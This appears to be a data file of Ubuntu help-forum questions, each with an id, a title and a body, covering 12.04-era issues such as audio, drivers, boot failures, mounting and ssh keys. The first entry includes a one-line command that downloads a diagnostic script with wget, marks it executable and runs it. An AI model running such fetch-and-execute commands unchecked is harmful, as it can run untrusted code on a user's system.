138743	voice audio comes weird and very low with a headphone	ubuntu 12.04 , i was watching videos very well until yesterday when i rebooted ubuntu because an upgrade . now when i see a video with voices i only heard very well the background sounds but when someone speak in the video the voices come weird and very low . this problem only happens with the headphone connected but when i disconnect it the sound of voice comes very well . the headphone is working in other computers . could anyone help me ? [ edit ] information : wget -o alsa-info.sh http : //www.alsa-project.org/alsa-info.sh & & chmod +x ./alsa-info.sh & & ./alsa-info.sh http : //www.alsa-project.org/db/ ? f=a0700d9055d6c2951c205d9c851c83420e6be44e [ /edit ] let me know the information you need . thanks daniel
138744	adobe flash plugin not working after being updated	i updated the adobe flash plug-in from the synaptic package manager . the updation was n't successful . after that i started to experience issues with adobe flash plugin in browsers , i was not able to watch videos on youtube . now when i open synaptic manager it gives an error run command `` sudo dpkg -- configure -a '' in terminal . when i run the command in terminal , it gives me an error , '' unable to fsync updated status of `` hicolor-icon-theme '' : input/output error ''
138750	how do i get stuff off of the unity laucher ?	within thirty seconds of installing ubuntu 12.04 ( to replace my problem-laden kubuntu 11.04 , by the way ) , i had figured out how to get stuff onto unity and move it around . on the other hand , after anywhere between two weeks and a month of having 12.04 , i have not figured out how to get stuff off the unity launcher to clean it up , considering i have too much stuff on it to begin with and want to put some on my desktop .
138757	how can i automate a root command after ( not during ) startup ?	i 'm using ubuntu 12.04 lts , but i need to run the following command : sudo dhclient after startup to acquire a stable ethernet connection . i am running dhclient during startup already , through the /etc/rc.local file . someone please help me run this command after-startup automatically ( by removing it 's requirement for root , or some other means ) , or suggest a different way of troubleshooting my ethernet connection .
138759	thunderbird occasionally does not display notifications on new mail arrival .	hi im using ubuntu 11 . i am using thunderbird as my email client . when i have a new email received , ubuntu gives me email notification which appears on my screen . but sometimes , there is no email notification even though i receive an email . this caused me delay in reading fresh emails . what may be the reason for this ? is this a bug in ubuntu ? whats an appropriate solution ? any help would greatly be appreciated . thanks
138760	how do i change the start up sound ?	how do i change the start up background music in ubuntu and can i add any customized music for startup ? what are the various ways of setting this ?
138763	why can i see multiple desktops on my laptop display ?	i 've just installed ubuntu 12.04 ( dual-boot with windows 7 ) and the image below shows the current display ( 6 multiple screens ) . anyone know how to rectify this ? step-by-step instruction is highly appreciated , i 'm a newbie ! thanks in advance !
138770	radeon 9200 driver ?	i 've been using linux for a while , but have n't really done more than installed programs . i have ubuntu 12.04 with an ati radeon 9200 graphics card . ubuntu did n't recognize it during the install . all i want is a driver . preferably the proprietary driver , but i 'll settle for an open-source one if i need to . i went to the amd support website , and whenever i click on the download link for `` ati proprietary linux x86 display driver 8.28.8 '' i get redirected to the main amd website . i tried this on firefox , chrome , even booted up my netbook and tried it on ie9 . does anybody have a download link ? and if not , a link to download an open-source alternative ? any help will be greatly appreciated . i 'm pretty much still a newbie at this . opengl vendor string : tungsten graphics , inc. opengl renderer string : mesa dri r200 ( rv280 5961 ) x86/mmx/sse2 tcl dri2 opengl version string : 1.3 mesa 8.0.2 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : no gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : no unity 3d supported : no
138773	ubuntu 12.04 sound settings crashes every time	i connected my bluetooth headset to my computer and whenever i try to change the audio input from my computer 's internal mic to the headset , the program crashes immediately . is this happening to just me or is it a common thing ? every other setting works ( changing output , adjusting volume , etc ) . it 's just when i click on my wireless headset under the input tab it crashes . how do i fix this ?
138776	wifi problem in downloading software packages ubuntu 12.04	in my ubuntu 12.04 sony vaio when trying to download packages from ubuntu repositories wifi speed is very slow . internet works fine for other downloads/browsing . i tried with changing the download server but no change . getting a download speed < 1kbps .
138793	i ca n't get past the login screen in 12.04	it just keeps asking for my password , taking it and going right back to asking for the password . the password is correct , and it will identify an incorrect password . have rebooted several times . last time i used it successfully , i had allowed it to install some upgrades , thinking it might fix a problem i had had with usb devices not mounting . i did get access in recovery mode and reset my pass word , but nothing changed . this is too bad , as i have really been enjoying ubuntu , and have invested some time getting it set up the way i like - i would rather not to a clean install . i am dual booting with windows , if that makes a difference .
138794	ca n't view urls that contain hyphens before them	some tumblr urls contain hyphens before them ( -example.tumblr.com ) . in windows , i was able to view these urls without any issue . in ubuntu , i 've tested it in chromium , chrome , firefox , and opera so i 've come to the conclusion that the problem is ubuntu . what can i do ? does anyone else have this problem ?
138796	ubuntu one music streaming api - getindexes.view only returning a subset of artists	i 'm writing an ubuntu one client for haiku for a student project , currently implementing the music streaming bit . i 'm only getting 52 artists in the response for getindexes.view in the xml response , but i get 119 artists in the android client and the web client . the request is called as : get https : //streaming.one.ubuntu.com/rest/getindexes.view ? u=xxxxxx & p=xxxxxx & v=1.2.0 & c=haiku any ideas what i 'm doing wrong here ?
138807	disable confirmation for lvm in preseed file ?	i 'm not sure which debconf option should i use to bypass this disk change confirmation : and does the order of debconf commands matters ?
138813	glitch while using the desktop wall plugin	i just upgraded to ubuntu 12.04 ( from 11.10 ) and i am the desktop wall plugin from compiz . my bindings for move left , right , down and up are ctrl plus the corresponding arrow key . since the upgrade , when i press ctrl and an arrow key my background image is visible for an instant and then the desktop is switched . this is very annoying as my background image is very bright and flashes me every time . if i switch my desktop and hold down the ctrl key and press another arrow key the glitch does not occur . is there any workaround for this ?
138820	why is ecryptfs so slow when running du -s ?	i have been using ubuntu 's encrypted home folder system for some time now and have not really noticed any slowdowns except in two specific cases . when i run du -s in my home folder , it takes several times longer than when doing it on the same data on an unencrypted partition . when entering a folder containing > 1000 images in krusader , it takes 10-20 seconds before krusader shows the files ( it is completely unresponsive during that time ) . both seem to have to do with accessing several thousands of files without really reading any of their data , which seems to mean that the system will have to traverse lots and lots of inodes . i ca n't see why this would be slower on ecryptfs than when not using encryption though since this should still be io-bound rather than cpu-bound even if the inodes are all encrypted . does anyone have any ideas ?
138824	how do i get keyboard shortcut working for maximise in gnome-shell ?	alt-f10 is supposed to be toggle maximise window but it does n't function . i 've checked it is bound in ccsm > general > keybindings and it is , but it 's just not working . ditto minimise . also the same is confirmed by settings > keyboard > shortcuts is there something else controlling/masking/blocking this ? ( nb . there are lots of posts on here about unity ; i am not using unity , but gnome shell )
138826	why is my huawei e1550 dongle detected but unable to connect to the internet ?	i am using ubuntu 12.04 . i am having problems getting my dongle to work . after i plug in the modem the network notification shows me that the device has been detected , but each time i try to connect to the internet it displays an icon that shows its trying to connect and then instantly disconnects . how can i get it to work ?
138827	hibernation fail on compaq 510	i have been tried to command hibernate in ubuntu 12.04. but it 's fail because not enough swap memory ( or not ) . please help me , i 'm using compaq 510 , 26 gb hardisk ( have windows 7 ) . and because of fail the loaded internet page become distorted sometime . help
138830	why does my speaker make a high noise if i remove my headphones and microphone ?	in my laptop after removing headphone and microphone there is a very high noise from built-in speakers . from the first time onwards . how can i solve this issue ?
138832	how to install the latest octave	i want to install octave on my ubuntu lts with apt-get . the problem is that the official repositories list only octave 3.0 and octave 3.2 , whereas the latest octave is octave 3.6 . how do i update the repositories of apt-get to get octave 3.6 ?
138834	how to close a window but not actually quit/exit the program	i use ubuntu 12.04 ( unity ) . how would i do that when i pressed the close button to minimize the window , as is the case with mac os . the program is closed but is still running in memory until it is completely closed by right-clicking and quit . this would be particularly useful especially for programs such as thunderbird and various twitter clients . p.s . sorry for my bad english .
138839	where does unity store the chameleonic launcher/dash color ?	i would like to use unity 's average background color ( the color of the launcher ) in conky , is there a ( configuration ) file which contains that color information ? or how could i fetch that ?
138842	upgrade vs clean install without formatting	i am currently using ubuntu 11.10 . in a few weeks i plan to upgrade to 12.04 . however , i have heard that upgrade can result in a broken system . so , i thought to make a clean install without formatting because i have heard that it reinstalls your system files and deletes your programs but your personal files and program preferences , which are in /home , are not deleted . how about upgrading and , if something goes wrong , make a clean install without formatting ? what are the differences between upgrade and clean install without formatting ?
138845	can i create a liveusb for installing lubuntu without using a cd ?	i 'm trying to understand how to create a liveusb for installing lubuntu . i 'm currently downloading the .iso , and i 'm trying to understand whether i can create a liveusb for installation without first using a cd . i 'd like to avoid using a cd if possible , but if a cd is necessary to create a liveusb , then i expect that i would just skip the usb entirely , and install from the cd .
138856	i cant find a way to return my 3d setting on	i just was installing a new virtual box and noticed that my desktop was running on 2d and i cant find a way to return it to 3d . its getting hard for me to use some of my applications , need some help
138857	how to install chemfig through apt-get	i 'm doing some latex and i need the chemfig package . as usual , i type the package name in synaptic but this time nothing matches the search . does anyone know how to install it ? is it possible through apt-get because i want to list all the packages needed to install to compile my latex source file for other people willing to compile it . thanks in advance : ) ps : i 'm running ubuntu 12.04 lts edit : it seems this post answers my question : ) i should have checked deeper if a related question had n't already been posted .
138860	how to make terminal start maximized ?	how to make terminal start maximized ? i am looking for a system-wide way , which would work with the ctrl+alt+t shortcut as well .
138862	how to type in persian in libreoffice ?	i am new to ubuntu 12.04 and am trying to install persian language support for a friend . i have been googleing for an hour and ca n't find a tutorial to explain this . i have added additional language support and added persian . what is the next step ? how can i type in persian in librewriter please ? many thanks
138878	changing file permissions on usb external hard drive	i am using an external usb hard drive for a long time in ubuntu 10.04 , both at work and at home . now i 've installed 12.04 at home . today i used the usb drive for the first time . i can read the disk but ca n't change the permissions of a file i wanted . output of `` mount '' /dev/sdb1 on /media/freecom hdd type vfat ( rw , nosuid , nodev , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush , uhelper=udisks ) i try sudo chmod u+w bsst-hdf_to_bsst-h5 and i get -rw-r -- r -- 1 paco paco 2956 dic 19 10:27 bsst-hdf_to_bsst-h5 any ideas would be appreciated . thanks in advance . hi again and sorry for the delay in answering . now i have tried to copy the device line from fstab from 10.04 to the laptop with 12.04 but still get an error message . error mounting : mount exited with exit code 1 : helper failed with : mount : only root can mount /dev/sdb1 on /media/freecom hdd the line i add to fstab to try to mount the usb drive is /dev/sdb1 /media/freecom\040hdd vfat rw , nosuid , nodev , uhelper=udisks , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , flush 0 0 when restoring original fstab and pluging the usb drive the output of mount is /dev/sdb1 on /media/freecom hdd type vfat ( rw , nosuid , nodev , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush , uhelper=udisks ) what should i add in fstab to get the drive fully working ? i wanted to change permissions on files in the usb drive . thanks again
138882	why do some running applications launch a new session when their icon is clicked in the launcher ?	here is my problem . i locked a software 's icon to the launcher . when i click it , programs run . when i click it again , it opens another session instead choosing running program . that happens virtualbox-ose , amsn , wireshark etc . how can i fix that ?
138883	at install time i allocated 80 gb for ubuntu . what happened to my 80gb ? how was that space used ?	first off , i 'm a newb . when i installed ubuntu it asked me how much drive space to allocate for the os and i said 80 gb . now i find that i am running out of hard drive space . disk utility shows that i have 3 partitions that have been added , but none of them are 80 gb . the partitions are : - 56 gb ext4 - 60 gb extended - 4.1gb swap the 60gb partition is a container for logical partitions . what is that ? i am new to any kind of issues concerning hard drives and containers for logical partitions . so my questions are why do i not have 80 gig available ? can i merge the 56gb partition with the 60gb partition so i can have more usable space for storing programs in linux ? requested output from : cat /proc/partitions major minor # blocks name 8 0 488386584 sda 8 1 40131 sda1 8 2 15360000 sda2 8 3 414029711 sda3 8 4 1 sda4 8 5 3984384 sda5 8 6 54970368 sda6 11 0 1048575 sr0 8 16 488358912 sdb 8 17 488357888 sdb1
138890	split landscape pdf into portrait pages	i am given a couple pdf files which are created using latex in a landscape format . on my 24 '' monitor , i can comfortably read them full screen , but it is a pain to use when the windows is smaller , like on my netbook . is there some way to split this pdf up into several landscape pages ?
138892	how can i permanently save a password-protected ssh key ?	i am using awesome window manager how can i permanently add private keys with password ? inspired by the answer here i have added the private keys in ~/.ssh/config contents of ~/.ssh/config : identityfile 'private key full path' permissions of ~/.ssh/config : 0700 but it does n't work for me . if i manually add the key in every session , it works but i 'm looking for a more elegant way ( not in .bashrc ) edit : using gnome classic ( no effects ) version . after adding the ssh key with ssh-copy-if to the remote host , i get the following prompt in terminal ( gnome terminal 3.0.1 ) when i 'm logging in : ssh -i .ssh/password-protected-key user @ host enter passphrase for key '.ssh/password-protected-key ' : using awesome window manager v3.4.10 . i had already gnome-keyring-dameon so i killed the other pid and run gnome-keyring-daemon -- start | grep sock ( i also added it in .profile ) the ( grep ) output : ssh_auth_sock=/tmp/keyring-2lxxxx/ssh i followed the exact same steps and likewise i have n't got any gui ssh-add dialog . edit 2 : i created a new password protected key from ubuntu 11.10 virtual machine on unity and i still ca n't get any password prompt . edit 3 : it seems that this can not work in awesome window manager : ( and possibly other..
138893	how to boot ubuntu in a dynamic disk where windows 7 is installed	my windows got crashed when i installed ubuntu 11.04 inside windows previously . http : //www.dynamic-disk.com/disadvantage-of-dynamic-disk.html
138897	is it safe to browse the internet with a livecd ?	in my case with a kubuntu 12.04 live usb , i wonder is it safe ? there have been a lot of updates ( 150+ or something ) since it came out . specifically with the usb , although i chose the `` discard on shutdown , unless you save them elsewhere '' option creating the liveusb , is there a chance that something malicious can sneak trough ? mount my partitions and place something there ? i mean it seems possible to me ( a slightly better noob , that is ) . and if that were true , should n't there be a warning ?
138898	formating ntfs partition into ext4 and setting up as home	i have 750gb drive and i have 3 partitions on it ( i am not counting swap . ) one is for ubuntu . second is for arch , and third is in ntfs format ( i have that partition since i was on windows and nope i did n't format it yet ) . i want to format this 600 gb ntfs partition , and 50 gb ext ( where is arch ) into one ext4 partition and set it as home in ubuntu . problem is that i already have /home specified on partition where ubuntu is installed . is it possible to do that , and if what would happen with my current /home partition ( would i lose that data , or what ) . to be clear i want from ubuntu to store data from now on this second partition . i was thinking to copy all that data from ntfs partition to current home , and then format it and flag it as home , then from old home partition copy that data back in new partition . is that possible ?
138900	lost the files pasted in ubuntu	directly to the point . i cut and pasted several .jpg files from a memory card to a partition in ubuntu , the partition itself is formatted in ntfs actually . now the odd things is i created a folder containing those images and i can still open the folder and view the images , before i reboot to update . then i reboot to my windows 7 ( i am dual-booting ) and when i open the partition the folder is not there , i do n't know if that 's normal but then i rebooted to enter ubuntu and when i mount the partition , the folder turned to a zip file . i checked the disk usage and calculating from files and folder that is visible and total disk space consumed , i assume that the data is there but how can i recover it ? i tried viewing hidden files but to no avail .
138907	hdmi onboard sound works but no analog sound	i 've installed ubuntu 12.04 recently on my computer , but there 's no sound . my computer mobo is intel and it has vga , dvi and hdmi outputs , all of them onboard . but i installed on it an external pci-e nvidia video card with another three vga , dvi and hdmi outputs . my monitor is plugged on nvidia card 's dvi port , so both hdmi ports are unused here 's results of command `` aplay -l '' : **** lista de dispositivos playback hardware **** placa 0 : intel [ hda intel ] , dispositivo 3 : hdmi 0 [ hdmi 0 ] dispositivo secundário : 1/1 dispositivo secundário # 0 : subdevice # 0 placa 1 : nvidia [ hda nvidia ] , dispositivo 3 : hdmi 0 [ hdmi 0 ] dispositivo secundário : 1/1 dispositivo secundário # 0 : subdevice # 0 placa 1 : nvidia [ hda nvidia ] , dispositivo 7 : hdmi 0 [ hdmi 0 ] dispositivo secundário : 1/1 dispositivo secundário # 0 : subdevice # 0 placa 1 : nvidia [ hda nvidia ] , dispositivo 8 : hdmi 0 [ hdmi 0 ] dispositivo secundário : 1/1 dispositivo secundário # 0 : subdevice # 0 placa 1 : nvidia [ hda nvidia ] , dispositivo 9 : hdmi 0 [ hdmi 0 ] dispositivo secundário : 1/1 dispositivo secundário # 0 : subdevice # 0 i know that , in theory , hdmi sound is working . but i need analog sound , because my monitor has no hdmi port . here 's results of lspci command : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:16.2 ide interface : intel corporation 5 series/3400 series chipset pt ider controller ( rev 06 ) 00:16.3 serial controller : intel corporation 5 series/3400 series chipset kt controller ( rev 06 ) 00:19.0 ethernet controller : intel corporation 82578dc gigabit network connection ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 ide interface : intel corporation 5 series/3400 series chipset 4 port sata ide controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.5 ide interface : intel corporation 5 series/3400 series chipset 2 port sata ide controller ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 8400 gs ] ( rev a2 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) 3f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) 3f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) 3f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) 3f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) 3f:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) 3f:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) anyone had a similar problem ? edit : solved my problem . analog sound on my soundboard was disabled on bios . after activating , everything worked nice .
138908	how to execute a script just by double clicking like .exe files in windows ?	how can i make a bash script executable by double clicking just like .exe files in windows ? i tried creating a launcher and assigning the script to it , but there are two consequences : the terminal twinkles , disappears , and nothing is done . you must specify to run in terminal in order to work . i have a script that installs tomcat on an offline pc , including all dependencies of tomcat in the script . i need to make the script work on double clicking like windows since most who use the script will not be familiar with ubuntu . forget the above explanation . i want to make a script that can be run by double-clicking on it , without using the terminal . anybody knows how ?
138910	files disapeared while moving	my files are disapeared while i move those files ! i moved my data from linux machine-ubuntu to my external hdd . but i can not find those files in both hdd ( desktop nor external hdd ) . i just click the directory and drag it . ( but ... i did n't unmount external hdd and just pull out usb . ) those data are very important , so i want to recover it ( or find it ) . what can i do for it ?
138912	problem after upgrading from 11.10 to 12.04	i had installed ubuntu 11.04 through cd alongside windows . i got a problem here in upgradation when i upgraded my ubuntu 11.10 version to 12.04.there were many errors too while installing upgrades.. the package got broken . after restarting the computer , it should appear ubuntu 12.04 , even here it is appearing ubuntu 11.10 with four dots just moving one by one and does not proceeds further , hangs here ! ! windows is running fine , i restarted computer many times , plugged out the charger ... nothing is working . how to solve this issue ? ? i 'm not a very frequent user of all this.. please guide me ...
138916	why is ubuntu 's clock getting slower or faster ?	ubuntu 's clock is off by about a half hour : where do i even start troubleshooting this ? it 's allegedly being set `` automatically from the internet '' . how can i verify that `` the internet '' knows what time it is ? details ubuntu has had plenty of time to communicate with the internet : $ date ; uptime fri may 18 05:56:00 pdt 2012 05:56:00 up 12 days , 10:48 , 2 users , load average : 0.61 , 0.96 , 1.15 this time server i found via a web search does appear to know the correct time : $ date ; ntpdate -q north-america.pool.ntp.org fri may 18 05:56:09 pdt 2012 server 208.38.65.37 , stratum 2 , offset 1752.625337 , delay 0.10558 server 46.166.138.172 , stratum 2 , offset 1752.648597 , delay 0.10629 server 205.189.158.228 , stratum 3 , offset 1752.672466 , delay 0.11829 18 may 05:56:18 ntpdate [ 29752 ] : step time server 208.38.65.37 offset 1752.625337 sec there are n't any reported errors related to ntp : $ grep -ic ntp /var/log/syslog 0 after rebooting , the time was automatically corrected and the following appeared in /var/log/syslog : may 18 17:58:12 aux ntpdate [ 1891 ] : step time server 91.189.94.4 offset 1838.497277 sec a log of the offset reported by ntpdate reveals that the clock is drifting by about 9 seconds every hour : $ while true ; do ntpdate-debian -q | tail -n 1 > > 'drift.log ' ; sleep 16m ; done ^c $ r -e ' attach ( read.table ( `` drift.log '' , header=false ) ) clock < - as.posixct ( paste ( v1 , v2 , v3 ) , format= '' % d % b % h : % m : % s '' ) fit < - lm ( v10~clock ) png ( `` drift.png '' ) plot ( clock , v10 , xlab= '' clock time '' , ylab= '' time server offset ( s ) '' ) abline ( fit ) mtext ( sprintf ( `` drift rate : % .2f s/hr '' , fit $ coefficients [ [ 2 ] ] *3600 ) ) '
138918	how do i disable the blank console `` screensaver '' on ubuntu server ?	how to disable blank screensaver on ubuntu server ? there 's no desktop or x , only console ( command-line interface ) .
138920	how to play bluray ?	how can i play bluray discs on ubuntu 12.04 64bit ? when i put the disc in my laptop it does n't even get mounted . jeggy @ localhost : ~ $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0009f0f2 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 195518463 97655808 7 hpfs/ntfs/exfat /dev/sda3 195520510 976771071 390625281 5 extended /dev/sda5 195520512 218957823 11718656 82 linux swap / solaris /dev/sda6 218959872 976771071 378905600 83 linux i have a dell xps 15 which should be able to play bluray discs . this is what it says on official dell site 8x dvd+/-rw ( standard ) , blu-ray disc™ combo ( reads blu-ray disc™ & writes to cd/dvd ) ; 12.7mm tray load
138922	path to user desktop using python	this may seem stupid to a few , but i was wondering if there was some code to find out the operating system of the present user , and then the path to his desktop using python .
138923	show desktop in ubuntu launcher	i have a problem in show desktop in the unity launcher ( ubuntu 12.04 ) i had activated through myunity than i moved it to the top of the launcher ( as in this image ) but today i made an update and the icon become a part of the launcher ( in the bottom ) as in the image and i ca n't move it to the top , please help me a need it in the top because when i open a lot of app it 'll be hidden and hard to find .
138933	installing mysql in ubuntu with putty	so ... i 'm trying to install mysql server in ubuntu 10.04 ( i do n't want other version of ubuntu ) and it do n't works ... i tried : sudo apt-get install mysql-server and also sudo apt-get install mysql-server-5.1 and i get this : i also tried : sudo aptitude install mysql-server and i get this : why do i get this ? ?
138936	how to correctly unmount an external usb hard-disk ?	i have a problem both with mounting and with unmounting my usb hard drive . this appeared when i upgraded to 12.04 . since then , when i insert the hd i get a message : unable to mount freeagent drive error mounting : mount exited with exit code 1 : helper failed with : mount : only root can mount /dev/sdf1 on /media/freeagent drive so i try a sudo pcmanfm and open the file manager with the required rights . i then do my business and eject the drive . the problem is , that when i shut down the computer then , it does not shut down . it remains on , just the window system gets shut down . then i see a black screen with various undecipherable text going on and the computer is not responsive . i have to shut it down manually . another problem is when i turn on the computer . before the window system is turned on , i get a message which goes approximately something like this : media/freeagent drive ( my disk ) is either missing or not yet available . wait or press s to skip mounting when i skip and do not mount the disk thereafter , i am able to shut the pc down without the before mentioned shutdown problem . please what should i do ? edit : my etc/fstab file : # /etc/fstab : static file system information . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # entry for /dev/sda7 : uuid=2fbc1e96-8d74-485e-8077-91e98d2275cb / ext4 errors=remount- $ # entry for /dev/sdf1 : uuid=646cfe7d6cfe48f6 /media/freeagent\040drive ntfs-3g defaults , nosuid $ # entry for /dev/sda3 : uuid=308e15138e14d2e8 /media/os ntfs-3g defaults , locale=en_us.utf-8 $ # entry for /dev/sda2 : uuid=22004b9b004b7537 /media/recovery ntfs-3g defaults , locale=en_us.utf-8 $ # entry for /dev/sda8 : uuid=bcb597e7-2400-4ce5-8ee8-c75f5b512b4d none swap sw 0 $
138940	how to find the current version of gnome	i 'm using ubuntu 12.04 . i tried $ gnome-about âgnome-version gnome-about : command not found $ gnome-session -- version gnome-session 3.2.1 why i need is because my desktop environment does n't look like http : //www.gnome.org/gnome-3/ though wikipedia states that the default gnome version on 12.04 is 3.4.1 .
138950	how to disable encrypted home directory ?	i know encrypted home directory is a great security function but i want tot disable it . i am using acronis true image server for linux to backup my files and partition ( in power on state , not offline ) . after mounting acronis image , my home directory contains no files . i cant find none of my files , folders bla bla . only files can i see is directories named /.encryptfs_fnek_encrypted_looonggstuffid ? ? ? ? in /home/.encryptfs/myusername/.private so i want to disable home encryption , but how ?
138952	how to install vmware 8.0 ( not 8.0.2 ) in ubuntu 12.04	i installed vmware 8.0 in ubuntu 12.04 , after installation process when i click on vmware icon nothing happens ! even do n't display any kind of error , what am i supposed to do ? does 12.04 support vmware 8.0 ? i found a patch can solve this problem for vmware 8.0.2 but did n't work for vmware 8.0 .
138958	after installing updates to a fresh install of 64-bit ubuntu 12.04 , my computer does not reboot .	i freshly installed ubuntu 12.04 64-bit on my computer with a dual boot of windows 7 . after installation it asks me to reboot . i do that and , after it reboots , the update manager automatically pops up and asks me to update around 140 things . the update goes fine and , after it completes , it asks me to reboot . this time when i reboot , the screen gets stuck at the ubuntu start screen ( the one with ubuntu written with 5 dots below it ) and does n't do anything for hours . what should i do ?
138959	can i retrieve data from a hard drive running ubuntu from a usb drive ?	my hard drive has been on the fritz recently , but i do n't think it 's too far gone yet . the computer still registers the drive , but windows 7 is being stubborn and refuses to boot . i 'm new to the linux game , and i was wondering if a system like ubuntu when run off a usb drive will be enough to recover my pertinent data - in other words , will ubuntu running of a usb stick be able to access my hard drive so i can back everything up ?
138972	what is the equivalent user for nobody : nobody from centos ?	i am converting from centos and am used to having a nobody : nobody user : group for running services . does ubuntu have a similar best practice user : group combination for running a service ?
138978	can not play any video on epiphany	i have installed the epiphany web browser developed by gnome but the problem i face is i can not see any video on it.. ! ! no flash content is displayed either . only a window showing totem player shows up ... how can i get it working ? ? i have flashplayer plugin installed along with gnash . only some youtube videos can be played.but only a handfull of them.. ! ! here is what happens- 1.flash content 2.youtube video videos from no other sites can be seen @ subv3rsion it gave me the following error-
138984	is there any way to get an indicator for ubuntu one ?	i would like to see an icon so that i know if ubuntu one uploads/downloads are going on . have n't found it yet . [ edit ] i tried the answers given and although able to add the software source , was not able to get the indicator going . tried for a couple hours then gave up . my issues may be specific to 11.10 .
138987	how can i install gedit-latex-plugin without installing the rest of tex ?	after installing ubuntu 12.04 gedit has gotten much better ( faster ) , and i 'm considering using it for latex . i have installed texlive 2011 via their own installation script ( ubuntu repositories only have 2009 version ) , so i 'd like to install gedit-latex-plugin without installing texlive from the repositories . this should be possible as far as i can see , as texlive is only recommended by the gedit-latex-plugin package , but i guess that there is some dependency of tex , that is only fulfil-able by texlive , which synaptic does n't show me . now , i 'd like to know the following : does anyone know of anywhere i can get this plugin without this dependency ? i have tried looking at the plug-ins homepage , but i find it a bit confusing .
138989	boot in whatever mode wo n't work for 12.04	when i boot in recovery mode i get a black screen with the mousecursor and that is it . when i boot in normal mode i get the purple ubuntu screen with the five orange/white dots and there everything stops . i have the 12.04 ubuntu . what can i do to get to the normal screen ? the nomodeset boot option did not work . i got stuck in a linux starting screen that stalled after `` checking battery status '' ; i tried to get a screenshot , but i could not paste it in windows 7 , from which i am working now , due to different partitions . i have a dell inspiron n7010 , intel ( r ) hd graphics , on x64 based pc , intel pentium cpu p6100 , 2.00 ghz , 1999 mhz , 2 core 's 2 logical processors bios dell a11 31.03.2011 , smbios 2.6 mem 4 gb , total virtual mem 7,6 gb the ubuntu / linux versions i see in the boot screen are : gnu-grub version 1.99-21ubuntu3 in the right corner below it says : debian the universal operating system . the versions are : ubuntu , with linux 3.2.0-24-generic-pae ubuntu , with linux 3.2.0-24-generic-pae ( recovery mode ) memory test ( memtest 86+ ) memory test ( memtest 86+ , serial console 115200 ) windows 7 ( loader ) ( on /dev/sda2 ) ubuntu , with linux 2.6.38-10-generic ( on /dev/sda5 ) ubuntu , with linux 2.6.38-10-generic ( recovery mode ) ( on /dev/sda5 ) ubuntu , with linux 2.6.38-8-generic ( on /dev/sda5 ) ubuntu , with linux 2.6.38-8-generic ( recovery mode ) ( on /dev/sda5 ) the 2.6.38-10 and 2.6.38-8 versions both work , but in those versions i can not approach my own files . the problems started after i installed updates in the update manager program , but i can not remember what updates . before that i also experienced a problem with starting a terminal . i saw the terminal window flash on the screen and then it vanished . no matter which terminal i tried to use . before that i also experienced a problem with starting a terminal . i saw the terminal window flash on the screen and then it vanished . no matter which terminal i tried to use . today i saw a message in a linux boot screen : modem-manager [ 1598 ] : could not get the systembus . make sure the messagebus daemon is running ! failed to connect to socket /var/run/dbus/system_bus_socket : no such file or directory i started ubuntu in recoverymode and received a lot of new software . thanks to that ( i think ) i can now approach the startmenu in which i can choose between gnome and ubuntu . but now i can not start in my own account and i do n't see any errormessages . i try to use my account and then i return to the original startmenu . i can start in the guestaccount , but then i can not use my own files . also in the guestaccount i do n't have any rights to change my own account . how can i repair that ? i can get in terminalmode with ctrl-alt-f1 . thank you .
138994	display resolution is not what is set	i have an acer emachines e727 with intel gma 4500m graphics . i installed ubuntu 12.04 using wubi on win7 . when i look at display from dash it shows 1024x768 , but what i am actually seeing looks more like 800x480 . what 's going on and how do i get it fixed ?
138996	split an x desktop across multiple machines	i work with several laptops on my desk at once . i 'm currently using x2x to allow my mouse and keyboard to go from one machine to the next . but what i 'd really like is to have one big x desktop running across all the machines . i 'd like to be able to create any x program , and move it to display on any of the laptops , or even split between two laptops . i know x is designed to separate display from computer , and it 's possible to run remote x displays . but can we create a single display where the left half is displayed on one machine , and the right half is displayed on another ? i think there used to be a display type of `` x on x '' , but i ca n't find it now . would that help me find a solution ? thanks .
